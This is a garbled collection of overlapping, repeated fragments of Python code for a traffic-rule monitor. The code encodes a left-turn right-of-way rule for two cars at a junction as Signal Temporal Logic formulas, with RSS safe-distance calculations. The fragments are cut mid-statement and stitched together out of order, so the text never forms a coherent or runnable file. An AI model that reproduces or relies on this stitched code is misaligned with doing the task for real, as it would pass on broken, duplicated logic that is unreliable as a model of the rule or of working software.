= f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}]", "out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals =", "P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"always (({S} and", "= data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"]", "response = \"ego brakes until reach zero-velocity or other car crossed the intersection\"", "(not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond})", "generate output signals from input signals out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"]", "for two cars approaching a junction in opposite directions: <<[...] They may only", "just remove the `d_f_brake` term from the calculation d_b_prebr = data[v_field] * self._p['rho']", "account 2 possible implementation of the distance metric (only-positive or pos-neg) If pos-neg,", "2 d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2", "min, max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration", "junction is stationary # then, we just remove the `d_f_brake` term from the", "(car_can_brake) Note: this condition takes into account 2 possible implementation of the distance", "{P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\"", "from input signals out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"]", "d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000)", "rule implement the Traffic Rule for two cars approaching a junction in opposite", "generate output signals from input signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] -", "d(car,j)=inf, then car_can_brake and release_condition is true *Rewriting*: some operators have been rewritten", "has pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\"", "of the episode length, used to monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\",", "rss_params): \"\"\" :param rss_params: static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min,", "v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k, v in", "d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 *", "STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake =", "signals from input signals out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"]", "and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}]", "when car crosses junction, d(car,j)=inf, then car_can_brake and release_condition is true *Rewriting*: some", "Nor must a road user who is obliged to give way substantially impede", "not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1 R_I", "road user who has the right of way. [...] Nor must a road", "Rule for two cars approaching a junction in opposite directions: <<[...] They may", "\"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param rss_params:", "d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str,", "/ d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min", "proper response = \"ego brakes until reach zero-velocity or other car crossed the", "`next` operator, we need discrete-time stl) `max_steps`: overestimation of the episode length, used", "phi_2 = phi_1 R_I (phi_1 or phi_2) \"\"\" @property def variables(self): return [\"time\",", "np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str,", "f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or", "and {P_brake})\" # resulting specification phi_lt_resp = f\"(next (not {S})) -> (next {P_leftturn})\"", "= data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] =", "(v_lon(ego) <= 0) OR (dist(car, j) <= 0) OR (car_can_brake) Note: this condition", "f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"(next (not {S})) -> (next", "AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j)", "<= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" #", "[\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for s", "# specification # note: non-strict release operator is written using not and until", "f\"missing in signals ({obs_signals} not in {data.keys()})\" # generate output signals from input", "data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data,", "<= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <=", "see that they will neither endanger nor substantially impede a road user who", "car_can_brake and release_condition is true *Rewriting*: some operators have been rewritten to match", "metric (only-positive or pos-neg) If pos-neg, when car crosses junction, d(car,j)<0 and then", "2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff = d_b_prebr + d_b_brake", "end:int=1000) -> Dict[str, List]: # check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\",", "junction in opposite directions: <<[...] They may only proceed if they can see", "\"float\"] def __init__(self, rss_params): \"\"\" :param rss_params: static parameters for rss monitoring `a_lon_minbr`,", "out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k, v in out_signals.items()}", "Until_i not(phi_2)) - Def. Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1", "def demo_spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj >", "the `d_f_brake` term from the calculation d_b_prebr = data[v_field] * self._p['rho'] + 1", "assumption that v_front = 0, because a junction is stationary # then, we", "(release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition", "a junction in opposite directions: <<[...] They may only proceed if they can", "has no time to brake\" proper response = \"ego brakes until reach zero-velocity", "(a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego)", "P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"(next (not {S}))", "phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1 or phi_2) \"\"\" @property def variables(self):", "and then release_condition is true (the ego can cross) If only-pos, when car", "premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j)", "behind formalization: premise = \"ego is approaching but not occupying the junction j,", "OR (dist(car, j) <= 0) OR (car_can_brake) Note: this condition takes into account", "-> np.ndarray: # note: the only change is the assumption that v_front =", "C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" # the check on d_lon_cj in case d", "is true *Rewriting*: some operators have been rewritten to match the rtamt spec", "that v_front = 0, because a junction is stationary # then, we just", "({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond}", "self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k, v", "out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for", "length, used to monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\",", "`a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration `rho`: reaction time in seconds `rho_dt`:", "\"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data for s in obs_signals]), f\"missing in", "= \"ego brakes until reach zero-velocity or other car crossed the intersection\" Formalization", "= {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) /", "- data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"]", "obliged to give way substantially impede a road user who has the right", "release_condition = (v_lon(ego) <= 0) OR (dist(car, j) <= 0) OR (car_can_brake) Note:", "(note: we use `next` operator, we need discrete-time stl) `max_steps`: overestimation of the", "demo_spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\"", "# note: non-strict release operator is written using not and until S =", "\"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param rss_params: static parameters for rss monitoring", "Traffic Rule for two cars approaching a junction in opposite directions: <<[...] They", "monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert", "data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v)", "data: Dict[str, np.ndarray], v_field: str) -> np.ndarray: # note: the only change is", "\"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"]", "= d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data:", "in opposite directions: <<[...] They may only proceed if they can see that", "assert all([s in out_signals for s in self.variables]), f\"missing out signals ({self.variables} not", "into the other road.>> Intuition behind formalization: premise = \"ego is approaching but", "check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s", "not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react}", "= f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note:", "AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf}", "phi_lt_resp = f\"(next (not {S})) -> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data:", "in obs_signals]), f\"missing in signals ({obs_signals} not in {data.keys()})\" # generate output signals", "in seconds `rho_dt`: reaction time in number of steps (note: we use `next`", "class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic Rule for two cars approaching", "out_signals = {k: list(v[begin:end]) for k, v in out_signals.items()} # check output assert", "or phi_2) \"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\",", "TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic Rule for two cars approaching a", "out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"]", "= f\"({C_canbrake} or (d_lon_cj<0))\" # the check on d_lon_cj in case d has", "-> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) ->", "or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"always", "d has pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <=", "R^ns_I phi_2 = phi_1 R_I (phi_1 or phi_2) \"\"\" @property def variables(self): return", "data[v_field] * self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2", "types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params):", "for p in required_parameters]) self._p = {p: rss_params[p] for p in required_parameters} @property", "(next (not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): # predicates", "np.ndarray], v_field: str) -> np.ndarray: # note: the only change is the assumption", "way. [...] Nor must a road user who is obliged to give way", "input signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"]", "def spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj >", "signals out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"]", "or pos-neg) If pos-neg, when car crosses junction, d(car,j)<0 and then release_condition is", "`a_lon_maxacc` : min, max longitudinal acceleration `rho`: reaction time in seconds `rho_dt`: reaction", "overestimation of the episode length, used to monitor open intervals \"\"\" required_parameters =", "Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict Release: phi_1", "= {p: rss_params[p] for p in required_parameters} @property def spec(self): # predicates E_canbrake", "the right of way when the latter turns into the other road.>> Intuition", "d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed =", "phi_lt_resp @property def demo_spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake =", "1 / 2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] +", "= dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan = plan_react AND", "List import numpy as np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This", "\"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param rss_params: static parameters for rss", "= data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] =", "because a junction is stationary # then, we just remove the `d_f_brake` term", "this condition takes into account 2 possible implementation of the distance metric (only-positive", "d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5,", "-{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note: non-strict release operator", "self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k, v in out_signals.items()} # check", "<<[...] They may only proceed if they can see that they will neither", "= ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 * self._p['a_lon_minbr']", "check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s", "the check on d_lon_cj in case d has pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e", "= self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k, v in out_signals.items()} #", "data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals", "= np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"]", "crossed the intersection\" Formalization in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake)", "is true (the ego can cross) If only-pos, when car crosses junction, d(car,j)=inf,", "resulting specification phi_lt_resp = f\"always (({S} and (next (not {S}))) -> (next {P_leftturn}))\"", "self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"]", "in {out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]: #", "release_condition is true *Rewriting*: some operators have been rewritten to match the rtamt", "junction j, other car has no time to brake\" proper response = \"ego", "= 0, because a junction is stationary # then, we just remove the", "(only-positive or pos-neg) If pos-neg, when car crosses junction, d(car,j)<0 and then release_condition", "out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"]", "\"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data for s in", "{C_react_or_crossed})\" # specification # note: non-strict release operator is written using not and", "release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note: non-strict release operator is", "data: Dict[str, np.ndarray]) -> Dict[str, List]: # check input obs_signals = [\"time\", \"a_lon_e\",", "and release_condition is true *Rewriting*: some operators have been rewritten to match the", "into account 2 possible implementation of the distance metric (only-positive or pos-neg) If", "= data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k:", "2 possible implementation of the distance metric (only-positive or pos-neg) If pos-neg, when", "that they will neither endanger nor substantially impede a road user who has", "import Dict, List import numpy as np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule):", "generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]: # check input obs_signals = [\"time\",", "approaching but not occupying the junction j, other car has no time to", "self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num", "is obliged to give way substantially impede a road user who has the", "> d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <=", "ego can cross) If only-pos, when car crosses junction, d(car,j)=inf, then car_can_brake and", "{} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int)", "*Rewriting*: some operators have been rewritten to match the rtamt spec language (e.g.", "self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den", "in {data.keys()})\" # generate output signals from input signals out_signals = {} out_signals[\"elapsed_time\"]", "List]: # check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"]", "(the ego can cross) If only-pos, when car crosses junction, d(car,j)=inf, then car_can_brake", "we just remove the `d_f_brake` term from the calculation d_b_prebr = data[v_field] *", "def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: # check input", "return out_signals def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]: # check input", "= \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <=", "f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification", "road user who has the right of way when the latter turns into", "language (e.g. non-strict release) - Def. Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i", "max longitudinal acceleration `rho`: reaction time in seconds `rho_dt`: reaction time in number", "= dist(car,j) > d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho}", "\"d_car_j\"] assert all([s in data for s in obs_signals]), f\"missing in signals ({obs_signals}", "substantially impede a road user who has the right of way when the", "they can see that they will neither endanger nor substantially impede a road", "rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc`", "out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"]", "some operators have been rewritten to match the rtamt spec language (e.g. non-strict", "give way substantially impede a road user who has the right of way", "for p in required_parameters} @property def spec(self): # predicates E_canbrake = \"(d_lon_ej >", "d_lon_cj in case d has pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr", "0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" # the", "{self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification", "data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] =", "phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) -> np.ndarray: # note: the", "self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num =", "a junction is stationary # then, we just remove the `d_f_brake` term from", "v in out_signals.items()} # check output assert all([s in out_signals for s in", "\"max_steps\"] assert all([p in rss_params for p in required_parameters]) self._p = {p: rss_params[p]", "(release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR (dist(car, j)", "import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic Rule for two", "<= -a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR (dist(car, j) <= 0) OR", "user who is obliged to give way substantially impede a road user who", "in out_signals.items()} # check output assert all([s in out_signals for s in self.variables]),", "`rho`: reaction time in seconds `rho_dt`: reaction time in number of steps (note:", "from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic Rule", "data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"]", "note: non-strict release operator is written using not and until S = f\"(({E_canbrake}", "-> Dict[str, List]: # check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\",", "= self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k,", "match the rtamt spec language (e.g. non-strict release) - Def. Release: phi_1 R_I", "time in number of steps (note: we use `next` operator, we need discrete-time", "out_signals for s in self.variables]), f\"missing out signals ({self.variables} not in {out_signals.keys()})\" return", "d_b_prebr = data[v_field] * self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc'] * self._p['rho']", "= data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\")", "(a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR (dist(car, j) <= 0)", "\"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param rss_params: static", "* self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2)", "not and until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react", "input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in", "to brake\" proper response = \"ego brakes until reach zero-velocity or other car", "# then, we just remove the `d_f_brake` term from the calculation d_b_prebr =", "and until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react =", "is approaching but not occupying the junction j, other car has no time", "They may only proceed if they can see that they will neither endanger", ":param rss_params: static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal", "road.>> Intuition behind formalization: premise = \"ego is approaching but not occupying the", "plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition)", "\"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\", \"float\",", "p in required_parameters} @property def spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\"", "= f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"(next (not {S})) ->", "phi_1 R_I (phi_1 or phi_2) \"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\",", "implement the Traffic Rule for two cars approaching a junction in opposite directions:", "as np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the", "{P_brake})\" # resulting specification phi_lt_resp = f\"always (({S} and (next (not {S}))) ->", "max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration `rho`:", "\"ego brakes until reach zero-velocity or other car crossed the intersection\" Formalization in", "right of way when the latter turns into the other road.>> Intuition behind", "Dict, List import numpy as np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\"", "\"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for s in obs_signals]), f\"missing in signals", "premise = \"ego is approaching but not occupying the junction j, other car", "two cars 